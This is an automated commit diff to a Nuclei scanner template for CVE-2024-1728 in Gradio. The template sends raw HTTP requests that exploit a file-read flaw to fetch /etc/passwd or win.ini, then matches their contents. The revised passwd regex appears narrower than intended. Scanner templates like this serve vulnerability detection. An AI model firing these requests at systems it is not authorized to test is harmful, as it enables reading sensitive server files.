Auto Update Nuclei [Mon Oct 7 18:26:18 UTC 2024] :robot:

plugins/gradio/gradio/CVE-2024-1728.yaml

@@ -32,12 +32,11 @@ info:
 http:
   - raw:
       - |
-        POST /queue/join? HTTP/1.1
+        POST /queue/join HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"data":[[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}]],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"}
-
+        {"data":[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"}
       - |
         GET /queue/data?session_hash={{randstr}} HTTP/1.1
         Host: {{Hostname}}
@@ -50,7 +49,7 @@ http:
       - type: regex
         name: extracted_path
         regex:
-          - "/tmp/gradio/.*/passwd"
+          - "/tmp/gradio/[^/]+/passwd"
           - "C:.*\\win\\.ini"
         internal: true
 
@@ -60,10 +59,15 @@ http:
         - /windows/win.ini
 
     stop-at-first-match: true
+    matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - 'contains_all(body,"bit app support","fonts","extensions") || regex("root:.*:0:0:", body)'
-          - 'status_code == 200'
-        condition: and
-# digest: 4a0a0047304502204f9e43d3d65d88c7c7e455cac31910da452594db692e486376608488baeea540022100c2739d4dc85f3249608bb57463db5c73577517042607f9bbdb8d83a38cd7f018:922c64590222798bb761d5b6d8e72950
+      - type: regex
+        regex:
+          - "root:[^:]:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+# digest: 4a0a004730450221008eaa1612b6d07642621a3f955e5a32619efaf769d75cbd0df78d835b5fef45a20220385eaf81f8bfcb2db40526248e626d991b73e39cb7a537c64a314b13e1a9f66e:922c64590222798bb761d5b6d8e72950